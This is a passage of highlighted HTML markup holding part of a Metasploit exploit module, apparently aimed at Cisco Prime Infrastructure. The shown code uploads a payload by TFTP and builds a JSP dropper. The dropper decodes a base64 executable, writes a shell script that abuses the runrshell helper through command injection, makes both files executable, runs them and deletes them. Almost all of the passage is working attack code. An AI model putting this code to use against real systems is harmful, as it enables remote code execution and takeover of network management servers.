class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;Context&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">'Msf'<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'MsfExploit'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;Action&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-i\">upload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-sy\">_<\/span>status<span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;Uploading TFTP payload to #{rhost}:#{datastore['RPORT_TFTP']} as '#{remote_file}'&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-96\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tftp_client<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send_write_request<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-97\">&nbsp;<\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-98\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">remote_file<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-99\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-101\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">generate_jsp_payload<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-102\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">exe<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">generate_payload_exe<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-103\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">base64_exe<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode_base64<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">exe<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-104\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-105\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">native_payload_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-106\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-107\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_raw<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-108\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_ostream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-109\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_pstream<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-110\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_buf<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-111\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_decoder<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-112\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_tmp<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-113\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_path<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-114\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_tmp2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-115\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_path2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-116\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_proc2<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-117\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-118\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">var_proc1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Text<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-119\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">chmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">Q<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-120\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#{var_proc1} = Runtime.getRuntime().exec(&#8220;chmod 777 &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-121\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Thread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-122\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-123\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-124\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">var_proc3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-125\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cleanup<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">Q<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Thread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#{var_proc3} = Runtime.getRuntime().exec(&#8220;rm &#8221; + #{var_path} + &#8221; &#8221; + #{var_path2});<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-129\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-v\">Q<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;%<\/span><span class=\"crayon-v\">@page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">import<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;java.io.*&#8221;<\/span><span class=\"crayon-ta\">%&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;%<\/span><span class=\"crayon-v\">@page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">import<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;sun.misc.BASE64Decoder&#8221;<\/span><span class=\"crayon-ta\">%&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;%<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_buf} = &#8220;#{base64_exe}&#8221;;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BASE64Decoder<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_decoder} = new BASE64Decoder();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">byte<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-138\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_tmp} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.bin&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-140\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_path} = #{var_tmp}.getAbsolutePath();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-141\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BufferedOutputStream<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_ostream} =<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bb691df2eea6742971466-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BufferedOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FileOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-c\">#{var_path}));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_ostream}.write(#{var_raw});<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_ostream}.close();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-146\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_tmp2} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.sh&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_path2} = #{var_tmp2}.getAbsolutePath();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-149\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">PrintWriter<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-c\">#{var_pstream} =<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-151\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PrintWriter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FileOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-c\">#{var_path2}));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-152\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_pstream}.println(&#8220;!#\/bin\/sh&#8221;);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_pstream}.println(&#8220;\/opt\/CSCOlumos\/bin\/runrshell &#8216;\\&#8221; &amp;&amp; &#8221; + #{var_path} + &#8221; #'&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_pstream}.close();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-155\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{chmod}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-156\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-157\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_proc2} = Runtime.getRuntime().exec(#{var_path2});<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{cleanup}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">Exception<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-161\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">%&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-163\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-164\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
